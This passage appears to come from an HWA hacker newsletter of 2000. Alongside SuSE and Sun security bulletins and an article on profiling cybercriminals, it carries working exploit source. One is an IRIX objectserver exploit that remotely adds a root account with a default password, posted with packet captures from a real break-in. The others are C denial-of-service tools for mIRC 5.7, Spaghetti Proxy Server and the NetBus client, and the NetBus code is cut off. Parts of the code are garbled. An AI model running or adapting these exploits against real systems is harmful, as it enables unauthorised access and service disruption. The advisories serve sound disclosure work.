09cbe9a08cf2b0d5d5d0b1963c3edbcd ftp://ftp.suse.com/pub/suse/i386/update/6.4/kpa1/kreatecd-0.3.8b-0.i386.rpm e59c71fa6ae5cf59af9aa1bdce89b015 ftp://ftp.suse.com/pub/suse/ppc/update/6.4/kpa1/kreatecd-0.3.8b-0.ppc.rpm ______________________________________________________________________________ You can find updates on our ftp-Server: ftp://ftp.suse.com/pub/suse/i386/update for Intel processors ftp://ftp.suse.com/pub/suse/axp/update for Alpha processors or try the following web pages for a list of mirrors: http://www.suse.de/ftp.html http://www.suse.com/ftp_new.html Our webpage for patches: http://www.suse.de/patches/index.html Our webpage for security announcements: http://www.suse.de/security If you want to report vulnerabilities, please contact security@suse.de ______________________________________________________________________________ SuSE has got two free security mailing list services to which any interested party may subscribe: suse-security@suse.com - moderated and for general/linux/SuSE security discussions. All SuSE security announcements are sent to this list. suse-security-announce@suse.com - SuSE's announce-only mailing list. Only SuSE's security annoucements are sent to this list. To subscribe to the list, send a message to: To remove your address from the list, send a message to: Send mail to the following for info and FAQ for this list: _____________________________________________________________________________ This information is provided freely to everyone interested and may be redistributed provided that it is not altered in any way. Type Bits/KeyID Date User ID pub 2048/3D25D3D9 1999/03/06 SuSE Security Team - ------BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQENAzbhLQQAAAEIAKAkXHe0lWRBXLpn38hMHy03F0I4Sszmoc8aaKJrhfhyMlOA BqvklPLE2f9UrI4Xc860gH79ZREwAgPt0pi6+SleNFLNcNFAuuHMLQOOsaMFatbz JR9i4m/lf6q929YROu5zB48rBAlcfTm+IBbijaEdnqpwGib45wE/Cfy6FAttBHQh 1Kp+r/jPbf1mYAvljUfHKuvbg8t2EIQz/5yGp+n5trn9pElfQO2cRBq8LFpf1l+U P7EKjFmlOq+Gs/fF98/dP3DfniSd78LQPq5vp8RL8nr/o2i7jkAQ33m4f1wOBWd+ cZovrKXYlXiR+Bf7m2hpZo+/sAzhd7LmAD0l09kABRG0JVN1U0UgU2VjdXJpdHkg VGVhbSA8c2VjdXJpdHlAc3VzZS5kZT6JARUDBRA24S1H5Fiyh7HKPEUBAVcOB/9b yHYji1/+4Xc2GhvXK0FSJN0MGgeXgW47yxDL7gmR4mNgjlIOUHZj0PEpVjWepOJ7 tQS3L9oP6cpj1Fj/XxuLbkp5VCQ61hpt54coQAvYrnT9rtWEGN+xmwejT1WmYmDJ xG+EGBXKr+XP69oIUl1E2JO3rXeklulgjqRKos4cdXKgyjWZ7CP9V9daRXDtje63 Om8gwSdU/nCvhdRIWp/Vwbf7Ia8iZr9OJ5YuQl0DBG4qmGDDrvImgPAFkYFzwlqo choXFQ9y0YVCV41DnR+GYhwl2qBd81T8aXhihEGPIgaw3g8gd8B5o6mPVgl+nJqI BkEYGBusiag2pS6qwznZiQEVAwUQNuEtBHey5gA9JdPZAQFtOAf+KVh939b0J94u v/kpg4xs1LthlhquhbHcKNoVTNspugiC3qMPyvSX4XcBr2PC0cVkS4Z9PY9iCfT+ x9WM96g39dAF+le2CCx7XISk9XXJ4ApEy5g4AuK7NYgAJd39PPbERgWnxjxir9g0 Ix30dS30bW39D+3NPU5Ho9TD/B7UDFvYT5AWHl3MGwo3a1RhTs6sfgL7yQ3U+mvq MkTExZb5mfN1FeaYKMopoI4VpzNVeGxQWIz67VjJHVyUlF20ekOz4kWVgsxkc8G2 saqZd6yv2EwqYTi8BDAduweP33KrQc4KDDommQNDOXxaKOeCoESIdM4p7Esdjq1o L0oixF12Cg== =pIeS - ------END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQEVAwUBOOucPney5gA9JdPZAQH4Tgf/fH0SmQlfvdhowia3LXKFeoTOA5EMn027 ldofK35EZLui4KpBwyxBvdGZXG1fBpCaO3SackdNxD1PzfTJk7ykjch9vmaD2Zq8 lbGoHqF1y823GzSvPu5VXaY2M3W8HbxWFGnc/Yh/v7ST6x0FVJAoFMImVkdWS7gZ TaEtyBeZBSTvcV/fzA7m3tFqoaCbCMWJTKBj9ENM4u8wM8GrCT+JQa6r/BzBb3VF QzAs6/dA/3PPc5k3qd7Zaf/9z6K6OMJaMoIr21w67D9M2XYb2luUlyjyrd1H3MGU iodDDcVYRUsGNBlDjTI42XdFXpgNWH6QtIbmjBsT6x/MdkeOTDlpMg== =2H9o -----END PGP SIGNATURE----- -- To unsubscribe, e-mail: suse-security-announce-unsubscribe@suse.com For additional commands, e-mail: suse-security-announce-help@suse.com @HWA 256.0 PSS: irix object server remote root exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ At 08:52 AM 3/29/2000 -0500, Howard wrote: >Since the patches are now officially released, I feel I can finally >release the details of the SGI objectserver vulnerability. This >vulnerability was initailly reported to CERT and SGI Security on >October 6, 1997. A beta version of patch 2849 was provided in >February 1998. > Hi. As a legitimate function of my work I routinely archive and catalog vulnerability information and exploit code. In the interest of full-disclosure and in possibly helping system administrators evaluate the security of their SGI boxen, I am attaching the remote exploit for Irix objectserver (udp 5135). There are big problems with the US government right now - if you are doing security work (let alone cracking!) be advised that things are getting seriously fucked. See the "L0phtcrack as a burglary tool" article? See all these kids getting PRISON sentences for typing? The government isn't playing by sane rules. Be prepared. Be awake! Marcy /* Copyright (c) July 1997 Last Stage of Delirium */ /* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF */ /* Last Stage of Delirium */ /* */ /* The contents of this file may be disclosed to third */ /* parties, copied and duplicated in any form, in whole */ /* or in part, without the prior written consent of LSD. */ /* SGI objectserver "account" exploit */ /* Remotely adds account to the IRIX system. */ /* Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2, */ /* which was supposed to be free from this bug (SGI 19960101-01-PX). */ /* The vulnerability "was corrected" on 6.2 systems but */ /* SGI guys fucked up the job and it still can be exploited. */ /* The same considers patched 5.x,6.0.1 and 6.1 systems */ /* where SGI released patches DONT work. */ /* The only difference is that root account creation is blocked. */ /* */ /* usage: ob_account ipaddr [-u username] [-i userid] [-p] */ /* -i specify userid (other than 0) */ /* -u change the default added username */ /* -p probe if there's the objectserver running */ /* */ /* default account added : lsd */ /* default password : m4c10r4! */ /* default user home directory : /tmp/.new */ /* default userid : 0 */ #include #include #include #include #include #include #include #include #define E if(errno) perror(""); struct iovec iov[2]; struct msghdr msg; char buf1[1024],buf2[1024]; int sck; unsigned long adr; void show_msg(){ char *p,*p1; int i,j,c,d; c=0; printf("%04x ",iov[0].iov_len); p=(char*)iov[0].iov_base; for(i=0;i1){ for(i=0;i<(16-c);i++) printf(" "); for(i=0;i1){ for(i=0;i<(16-c);i++) printf(" "); for(i=0;i>8; dodaj_two[offset++]=userid&0xff; } else dodaj_two[offset++]=0x00; memcpy(&dodaj_two[offset],&dodaj_five[0],39); offset+=39; dodaj_one[10]=offset>>8; dodaj_one[11]=offset&0xff; new_account(offset); } } /* end g23 exploit post */ __________________________________________________ Do You Yahoo!? Talk to your friends online with Yahoo! Messenger. http://im.yahoo.com Sender: Bugtraq List From: "Howard M. Kash III" Subject: Objectserver vulnerability X-To: BUGTRAQ@securityfocus.com Since the patches are now officially released, I feel I can finally release the details of the SGI objectserver vulnerability. This vulnerability was initailly reported to CERT and SGI Security on October 6, 1997. A beta version of patch 2849 was provided in February 1998. Howard ----- Forwarded message # 1: Date: Mon, 6 Oct 97 7:09:51 EDT From: "Howard M. Kash III" To: cert@cert.org, security-alert@sgi.com Subject: URGENT - new SGI vulnerability [Internal error while calling pgp, raw data follows] -----BEGIN PGP SIGNED MESSAGE----- URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT SGI objectserver vulnerabilty allows remote users to create accounts. Yesterday two of our hosts were compromised by an (as far as I could determine) unknown, unpatched bug in SGI's objectserver. The attack consisted of sending UDP packets to port 5135 (see below). The result was a non-root account being added to the system. The two compromised hosts were running IRIX 6.2, but the vulnerability may affect other versions of IRIX. The vulnerability does not appear to give root access directly, as the attackers used other IRIX vulnerabilities to gain root access after logging into the new account. Attached are the UDP packets exchanged between the attacking host (aaa.aaa.aaa.aaa) and the target host (ttt.ttt.ttt.ttt). IP addresses have been masked to protect the guilty - I mean innocent until proven guilty. The result of this sequence of packets is the following line added to /etc/passwd: gueust:x:5002:20:LsD:/tmp/.new:/bin/csh An entry must also be added to /etc/shadow since the attacker then logs into the new account with a password. As a temporary measure we have blocked all traffic to port 5135 at our gateway. Howard Kash U.S. Army Research Lab - ------------------------------------------------------------------------ TCP and UDP headers have been separated out. I've decoded some of the packet contents into its ascii equivalent below the line. 16:52:00.631310 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 52 4500 0050 7d95 0000 2a11 bfb5 aaaa aaaa tttt tttt 112a 140f 003c 6516 0001 0000 0001 0000 0000 0024 0000 0000 2103 0043 000a 000a 0101 3b01 6e00 0080 4301 0118 0b01 013b 016e 0102 0103 0001 0107 0101 16:52:00.638455 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 95 4500 007b 0644 0000 3a11 26dc tttt tttt aaaa aaaa 140f 112a 0067 0d37 0001 0186 0001 0000 0000 004f 0000 0000 2903 0043 000a 0080 4300 8043 0105 0a01 013b 0178 0469 0a79 9a01 330a 0101 3b01 7804 690a 799a 0138 0a01 013b 0178 0469 0a79 9a01 020a 0101 3b01 7804 690a 799a 0103 0a01 013b 0178 0469 0a79 9a01 04 16:52:00.794985 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 312 4500 0154 7da3 0000 2a11 bea3 aaaa aaaa tttt tttt 112a 140f 0140 a1b2 0001 0000 0001 0000 0000 0128 0000 0000 1c03 0043 0201 1d0a 0101 3b01 7804 690a 799a 0102 0a01 013b 0178 0000 8043 0110 170b 0101 3b01 6e01 0101 0943 0106 6775 6575 7374 g u e u s t 170b 0101 3b01 0201 0101 0943 0103 4c73 L s 4417 0b01 013b 016e 0106 0109 4300 170b D 0101 3b01 6e01 0701 0943 0017 0b01 013b 0102 0103 0109 4300 170b 0101 3b01 6e01 0901 0943 0017 0b01 013b 016e 010d 0109 4300 170b 0101 3b01 6e01 1001 0943 0017 0b01 013b 016e 010a 0109 4300 170b 0101 3b01 6e01 0e01 0301 0917 0b01 013b 016e 0104 0109 4301 0d61 6b46 4a64 7865 6e4b 6e79 532e 170b 0101 3b01 6e01 1101 0943 0109 2f74 6d70 2f2e 6e65 7717 0b01 013b / t m p / . n e w 016e 0112 0109 4301 0470 6f6f 7417 0b01 013b 016e 0102 0103 0017 0b01 013b 016e 0113 0109 4301 082f 6269 6e2f 6373 6817 / b i n / c s h 0b01 013b 016e 010f 0109 4301 074c 7344 2f43 5444 16:52:00.921356 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 41 4500 0045 0646 0000 3a11 2710 tttt tttt aaaa aaaa 140f 112a 0031 0ef5 0001 0187 0001 0000 0000 0019 0000 0000 2503 0043 0201 1d0a 0080 4300 0a01 013b 0178 0469 0a79 9a01 39 16:53:33.226155 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 52 4500 0050 8f33 0000 2a11 ae17 aaaa aaaa tttt tttt 112f 140f 003c 6511 0001 0000 0001 0000 0000 0024 0000 0000 2103 0043 000a 000a 0101 3b01 6e00 0080 4301 0118 0b01 013b 016e 0102 0103 0001 0107 0101 16:53:33.232248 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 108 4500 0088 0669 0000 3a11 26aa tttt tttt aaaa aaaa 140f 112f 0074 3f4f 0001 0188 0001 0000 0000 005c 0000 0000 2903 0043 000a 0080 4300 8043 0106 0a01 013b 0178 0469 0a79 9a01 330a 0101 3b01 7804 690a 799a 0138 0a01 013b 0178 0469 0a79 9a01 390a 0101 3b01 7804 690a 799a 0102 0a01 013b 0178 0469 0a79 9a01 030a 0101 3b01 7804 690a 799a 0104 16:53:33.420972 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 314 4500 0156 8f3e 0000 2a11 ad06 aaaa aaaa tttt tttt 112f 140f 0142 1399 0001 0000 0001 0000 0000 012a 0000 0000 1c03 0043 0201 1d0a 0101 3b01 7804 690a 799a 0102 0a01 013b 0178 0000 8043 0110 170b 0101 3b01 6e01 0101 0943 0106 6775 6575 7374 170b 0101 3b01 0201 0101 0943 0103 4c73 4417 0b01 013b 016e 0106 0109 4300 170b 0101 3b01 6e01 0701 0943 0017 0b01 013b 0102 0103 0109 4300 170b 0101 3b01 6e01 0901 0943 0017 0b01 013b 016e 010d 0109 4300 170b 0101 3b01 6e01 1001 0943 0017 0b01 013b 016e 010a 0109 4300 170b 0101 3b01 6e01 0e01 0301 0917 0b01 013b 016e 0104 0109 4301 0d61 6b46 4a64 7865 6e4b 6e79 532e 170b 0101 3b01 6e01 1101 0943 0109 2f74 6d70 2f2e 6e65 7717 0b01 013b 016e 0112 0109 4301 0475 7365 7217 0b01 013b 016e 0102 0103 0213 8a17 0b01 013b 016e 0113 0109 4301 082f 6269 6e2f 6373 6817 0b01 013b 016e 010f 0109 4301 074c 7344 2f43 5444 16:53:33.580619 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 41 4500 0045 0671 0000 3a11 26e5 tttt tttt aaaa aaaa 140f 112f 0031 0dee 0001 0189 0001 0000 0000 0019 0000 0000 2503 0043 0201 1d0a 0080 4300 0a01 013b 0178 0469 0a79 9a01 3a -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBNDjGrKDxPoYWV34tAQGVJwQA0OHHlupV1LDF6bFcnWuNfnancEmSs8ee nF1LRhJrxnniPYI05xZ6aR5OIgtwVFtlAxDdWsgKxuuu3k/CTnSMA3ObsTG1GW1w I7AXwNmKMUGCglVv6evDHXWbwR6uao//8c/Hfi1s09d/jZIiy2zFm4Gnrkw0sGj+ n9jE26XP5HU= =yKsl -----END PGP SIGNATURE----- ----- End of forwarded messages [End of raw data] @HWA 257.0 PSS: Sun bind advisory ~~~~~~~~~~~~~~~~~~~~~~ -----BEGIN PGP SIGNED MESSAGE----- ________________________________________________________________________________ Sun Microsystems, Inc. Security Bulletin Bulletin Number: #00194 Date: March 29, 2000 Cross-Ref: CERT Advisory CA-99-14 Title: BIND ________________________________________________________________________________ The information contained in this Security Bulletin is provided "AS IS." Sun makes no warranties of any kind whatsoever with respect to the information contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW. IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE, PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. If any of the above provisions are held to be in violation of applicable law, void, or unenforceable in any jurisdiction, then such provisions are waived to the extent necessary for this disclaimer to be otherwise enforceable in such jurisdiction. ________________________________________________________________________________ 1. Bulletin Topics Sun announces the release of patches for Solaris(tm) 7 which relate to four vulnerabilities in BIND reported in CERT Advisory CA-99-14. Sun recommends that you install the patches listed in section 4 immediately on systems running Solaris 7 with Sun's implementation of BIND. 2. Who is Affected Vulnerable: Solaris 7 running Sun's implementation of BIND Not vulnerable: All other supported versions of Solaris. 3. Understanding the Vulnerabilities The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. CERT Advisory CA-99-14 describes six vulnerabilities in certain versions of BIND. Solaris 7 is vulnerable to the following four vulnerabilities reported in the CERT advisory. Vulnerability #3: the "so_linger bug" Remote attackers may degrade the performance of named. Vulnerability #4: the "fdmax bug" Remote attackers may cause named to crash. Vulnerability #5: the "maxdname bug" Remote attackers may cause named to crash. Vulnerability #6: the "naptr bug" Remote attackers may cause named to crash. The CERT advisory CA-99-14 is available at: ftp://info.cert.org/pub/cert_advisories/CA-99-14-bind.txt No other supported versions of Solaris (including Solaris 8) are affected by any of the six vulnerabilities reported in the CERT advisory. 4. List of Patches The following patches are available in relation to the above problems. Solaris version Patch ID _______________ _________ Solaris 7 (SPARC) 107018-02 106938-03 Solaris 7 (Intel) 107019-02 106939-03 _______________________________________________________________________________ APPENDICES A. Patches listed in this bulletin are available to all Sun customers at: http://sunsolve.sun.com/securitypatch B. Checksums for the patches listed in this bulletin are available at: ftp://sunsolve.sun.com/pub/patches/CHECKSUMS C. Sun security bulletins are available at: http://sunsolve.sun.com/security D. Sun Security Coordination Team's PGP key is available at: http://sunsolve.sun.com/pgpkey.txt E. To report or inquire about a security problem with Sun software, contact one or more of the following: - Your local Sun Solution Center - Your representative computer security response team, such as CERT - Sun Security Coordination Team. Send email to: security-alert@sun.com F. To receive information or subscribe to our CWS (Customer Warning System) mailing list, send email to: security-alert@sun.com with a subject line (not body) containing one of the following commands: Command Information Returned/Action Taken _______ _________________________________ help An explanation of how to get information key Sun Security Coordination Team's PGP key list A list of current security topics query [topic] The email is treated as an inquiry and is forwarded to the Security Coordination Team report [topic] The email is treated as a security report and is forwarded to the Security Coordination Team. Please encrypt sensitive mail using Sun Security Coordination Team's PGP key send topic A short status summary or bulletin. For example, to retrieve a Security Bulletin #00138, supply the following in the subject line (not body): send #138 subscribe Sender is added to our mailing list. To subscribe, supply the following in the subject line (not body): subscribe cws your-email-address Note that your-email-address should be substituted by your email address. unsubscribe Sender is removed from the CWS mailing list. ________________________________________________________________________________ Copyright 2000 Sun Microsystems, Inc. All rights reserved. Sun, Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks of Sun Microsystems, Inc. in the United States and other countries. This Security Bulletin may be reproduced and distributed, provided that this Security Bulletin is not modified in any way and is attributed to Sun Microsystems, Inc. and provided that such reproduction and distribution is performed for non-commercial purposes. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOOJQKrdzzzOFBFjJAQHbJAQAmcXk9+7E0mB5ybqEK9eKjbtqxEfkwcqF sGMNYLMpcQEM67uWzPfZzn5BB+FMKfYJjF0cZlBOMgt7zVWakIZxq7NoW3Qu3XV6 GLjoe0gqNAyuDrDZBiHinPhnFh5Url4OK7T9+DTrorJry7KrmD5t+YRjEUN3Nqro MDlDgR9fAu0= =cDAV -----END PGP SIGNATURE----- @HWA 258.0 Cyberprofiling ~~~~~~~~~~~~~~ Source: http://www.infosecuritymag.com/ DIGITAL FORENSICS SIDEBAR • CYBERPROFILING CyberCrime Watch Computers don't commit electronic breaches. People do. BY TERRY M. GUDAITIS Contrary to depictions in Hollywood movies, those responsible for the majority of cyber- crimes, hacking incidents and cyberdeviant acts cannot be "profiled" as a certain demographic type. Cyberstalkers and online child pornographers do not look deviant; in fact, they are as diverse as the employee population of any company. Con-sider, for example, two recent perpetrators: the former head of Disney's Go Nework, Patrick Naughton, who has been charged with trying to meet a 13-year-old girl he encountered in an Internet chat room, allegedly with the intent to have sex with her; and Harvard Divinity School's former dean, Ronald Thiemann, who was dismissed for storing child pornography on his office PC. Many infosecurity practitioners think about their work within a purely technical context: firewalls, routers, switches, monitoring software and so on. This is particularly the case when it comes to cyberforensics. While it's clear that a technical approach to forensics is critical to uncovering evidence from computer-based crimes, the tendency to focus on technology alone comes at the expense of an equally important activity: cybercrime profiling. One aspect of infosec that is consistently overlooked, underestimated or incorrectly defined is the human dimension. Humans are the catalysts behind the keyboards and modems used to conduct computer crimes. Consequently, anyone who has responsibility for systems security, incident response teams, business continuity planning and IT hiring must understand the implications of online behavior and computer use beyond purely technical considerations. They must understand how to identify cyberdeviant behavior, how to identify the perpetrators, how to protect the innocent and how to reduce organizational vulnerability. What Is Cyberprofiling? Profiling is the process by which a crime scene is observed, evaluated and assessed from behavioral, psychological and criminological perspectives in order to provide sociological insight into the offending individual(s). The concept behind criminal profiling is that weapons do not commit the crimes--people do. Put in a technical context, computers don't hack--hackers do. The individuals who are penetrating systems, launching distributed denial-of-service attacks and defacing Web pages are the problem, not the advancing technologies and the availability of hacking scripts on the Internet. Profiling provides the necessary means to assess and understand the perpetrators of these electronic crimes. For decades, criminal or psychological profiling has been used by law enforcement and the intelligence community to assess criminals, groups, organizations, cultures and, most notably, serial killers. Analogously, most hackers do not hack just once. They have a pattern, an MO and a "signature." The use of criminal profiling in a technical setting is an effective tool to narrow the suspect pool, provide insight into the motivation of the perpetrator, possibly predict the hacker's next move (which, in recent notable cases, involved attempted extortion) and, ultimately, assist in the interview and interrogation process of an identified perpetrator. When assessing a conventional crime scene, investigators enlist the assistance of relevant professionals, including demolitions experts, medical examiners, fingerprint examiners, ballistics experts and psychological profilers. Cyberprofiling involves a similar process, with technical experts, systems ad-ministrators, Web programmers, Unix experts, Windows gurus and antivirus specialists. The added tool of profiling centers on the behavior of the perpetrator. When used in conjunction with technical forensics tools, cyberprofiling helps you… • Narrow the suspect pool o Identify single or multiple perpetrators • Determine an organization's vulnerabilities • Predict perpetrator behavior • Mitigate an incident • Supplement the interview or interrogation process • Assist in the evidence collection and prosecution • Provide suggestions and follow-up post-incident Profiling Myths and Legends The depiction of criminal and psychological profiling in movies and on TV often misrepresents what profiling really is...and how a profile is generated. • Profiling is not psychological testing; and psychological testing does not derive a profile. • Profiling is not a static process; people are dynamic and distinct, and the process of profiling must be dynamic and evolving. • Profiling is not inductive. It is not studying data, creating a template and applying that template to criminal incidents. • Profiling is conducted on a case-by-case basis. The profile is derived deductively from that case-specific data. The most important thing to realize is that every case is distinct: There is no one hacker profile! In the never-ending battle against computer crime, companies have invested substantial capital in advanced computer forensics tools and intrusion detection technologies. At the same time, organizations have spent a great deal of money educating employees combating hostile work environments, discrimination and sexual harassment. For cyberforensics to be a complete science, the same level of emphasis and funding must be devoted to the "human side" of computer crime investigation. TERRY M. GUDAITIS, Ph.D. (terry.gudaitis@cip.saic.com), is a criminal profiler in the High-Tech Criminal Investigations unit of Global Integrity Corp. @HWA 259.0 mIRC 5.7 Exploit code ~~~~~~~~~~~~~~~~~~~~~ Use blind spoofing to crash the mIRC client by sending malformed server messages. /* diemirc.c - mIRC 5.7 denial of service exploits. (c) Chopsui-cide/MmM '00 The Mad Midget Mafia - http://midgets.box.sk/ Disclaimer: this program is proof of concept code, and is not intended to be used maliciously. By using this code, you take all responsibility for any damage incurred by the use of it. This program listens on port 6667 for incoming connections, then crashes mIRC using the exploit you choose. */ #include #include #define LISTEN_PORT 6667 #define TARGET_NICK "Chopsui-cide" void listen_sock(int sock, int port); void die(char *message); int poll_for_connect(int listensock); int select_sploit(); void exploit1(int s); void exploit2(int s); void exploit3(int s); void exploit4(int s); main() { int ls; int c; WSADATA wsaData; WORD wVersionRequested; wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) die("Unable to initialise Winsock."); if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) die("Unable to create socket."); c = select_sploit(); listen_sock(ls, LISTEN_PORT); printf("Waiting for connection on port %d...\n", LISTEN_PORT); ls = poll_for_connect(ls); switch (c) { case 0 : exploit1(ls); break; case 1 : exploit2(ls); break; case 2 : exploit3(ls); break; case 3 : exploit4(ls); } closesocket(ls); return 0; } void listen_sock(int sock, int port) { struct sockaddr_in addr; int c = 0; memset((char *)&addr,'0', sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = INADDR_ANY; addr.sin_port = htons(port); if (bind(sock, &addr, sizeof(addr)) == -1) die("Error binding socket."); if (listen(sock, 20) == -1) die("Error listening."); } void die(char *message) { printf("Fatal error: %s\n", message); exit(1); } int poll_for_connect(int listensock) { struct sockaddr_in peer; int sendsock; int szpeer = sizeof(peer); do { sendsock = accept(listensock, (struct sockaddr *) &peer, &szpeer); } while(sendsock == -1); printf("Connection from [%s].\n", inet_ntoa(peer.sin_addr)); return sendsock; } #define last_select 3 int select_sploit() { char k; printf("Select exploit:\n0 - incomplete nick change.\n"); printf("1 - msg with loads of parameters.\n2 - incomplete mode change.\n"); printf("3 - incomplete kick.\n"); k = getch(); if (atoi((char *)&k) > last_select) { printf("Invalid selection.\n"); exit(1); } if (((int)k < 0x30) || ((int)k > 0x39)) { printf("Invalid selection.\n"); exit(1); } return atoi((char *)&k); } /* Exploit 1: incomplete nick change mIRC 5.7 and past versions seem to suffer from bugs involving incomplete messages. I previously e-mailed Khaled M. Bey about one such bug, and it's fixed in this version, but there are other similiar (almost identical) bugs still in v5.7. This attack is executed from the _server_ side. All we need to do is send the client a half complete nick change message, ie ":!ident@host.com NICK" We must put the target's current nick name where is. */ #define END "!ident@host.com NICK\x0a" void exploit1(int s) { char sod[256]; memset((char *)&sod, '\0', 256); sod[0] = ':'; strcat(sod, TARGET_NICK); strcat(sod, END); send(s, sod, 256, 0); Sleep(1000); // Make sure the packet gets there. } /* Exploit 2: server message overflow If the client sends a large message with to many parameters, it crashes, and part of the buffer is stuffed into EAX. */ #define MSG_LEN 1000 // This must be an even number. void exploit2(int s) { char sod[MSG_LEN]; int c = 0; do { sod[c] = 0xff; sod[c + 1] = ' '; c += 2; } while(c < MSG_LEN); send(s, sod, MSG_LEN, 0); Sleep(1000); // Make sure the packet gets there. } /* Exploit 3: incomplete mode change This is basically the same as the nick change exploit. */ #define END "!ident@host.com MODE\x0a" void exploit3(int s) { char sod[256]; memset((char *)&sod, '\0', 256); sod[0] = ':'; strcat(sod, TARGET_NICK); strcat(sod, END); send(s, sod, 256, 0); Sleep(1000); // Make sure the packet gets there. } /* Exploit 4: incomplete kick Another incomplete message bug. */ #define JOIN " JOIN #\x0a" #define KICK ": KICK #\x0a" void exploit4(int s) { char sod[256]; memset((char *)&sod, '\0', 256); sod[0] = ':'; strcat(sod, TARGET_NICK); strcat(sod, JOIN); printf("%s%s", sod, KICK); send(s, sod, strlen(sod), 0); send(s, KICK, strlen(KICK), 0); Sleep(1000); // Make sure the packet gets there. } @HWA 260.0 Spaghetti proxy server exploit code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* sps3.c - Spaghetti Proxy Server 3.0 DoS attack (c) Chopsui-cide/MmM '00 The Mad Midget Mafia - http://midgets.box.sk/ Spaghetti Proxy Server claims to offer "complete security". In reality, it does the exact opposite. As well as being vulnerable to a rather simple bug, it stores your RAS username and password in plaintext in the registry keys: HKEY_LOCAL_MACHINE\SOFTWARE\aVirt\Gateway Home\3.0\RAS\RASPassword and HKEY_LOCAL_MACHINE\SOFTWARE\aVirt\Gateway Home\3.0\RAS\RASUserName This simple program will cause SPS to crash. It does not appear as though arbitrary code could be execute using this vulnerability. Usage: sps3 */ #include #include #define PORT 38126 #define LEN 33 void fatal_error(char *message); int connect_sock(int sock, char *host, int port); int create_sock(); main(int argc, char *argv[]) { WSADATA wsaData; WORD wVersionRequested; int sock; char str[LEN]; if (argc < 2) { printf("Usage: sps3 \n"); exit(0); } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) fatal_error("Unable to initialise Winsock."); if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) fatal_error("Unable to create socket."); connect_sock(sock, argv[1], PORT); memset(str, 'X', LEN); send(sock, str, LEN, 0); Sleep(5000); // This may obviously have to be increased. closesocket(sock); printf("Done\n"); } int connect_sock(int sock, char *host, int port) { struct sockaddr_in addr; struct hostent *he; memset(&addr, '0', sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(host); addr.sin_port = htons(port); if ((he = gethostbyname(host)) != NULL) memcpy((char *)&addr.sin_addr, he->h_addr, he->h_length); else if ((addr.sin_addr.s_addr = inet_addr(host)) == -1) fatal_error("Invalid host."); if (connect(sock, (struct sockaddr_in *)&addr, 16) == -1) fatal_error("Error connecting."); printf("Connected to %s:%d\n", host, port); return 0; } void fatal_error(char *message) { printf("Fatal error: %s\n", message); exit(1); } @HWA 261.0 schoolbus.c - netbus 1.7 client exploit crashes script kids box ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* schoolbus.c - Remote DoS exploit for NetBus 1.7 client (c) -Chopsui-cide/[M-m-M]- 1999 The Mad Midget Mafia [M-m-M] - http://underground2.4mg.com/ A nice anti-lamer device - freezes NetBus 1.7, sometimes taking the rest of the system with it (on slow systems). */ #include #include #include #include #define CRASHLEN 80000 char *ver = {"NetBus 1.7"}; char *message = {"Message; Uh oh! You've been screwed, you talentless script kiddie."}; char cr[] = {0,13}; void listen_sock(int sock, int port); // Starts the socket listening void die(char *message); // Fatal error int poll_for_connect(int listensock); // Wait for connect void bye_bye_script_kiddie(int sock); // Sends the crash :) main(int argc, char *argv[]) { WSADATA wsaData; WORD wVersionRequested; int listensock; int sendsock; int c = 0; if (argc < 2) { puts("Usage: schoolbus "); exit(0); } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) die("Unable to initialise Winsock."); if ((listensock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) die("Unable to create socket."); if ((sendsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) die("Unable to create socket."); 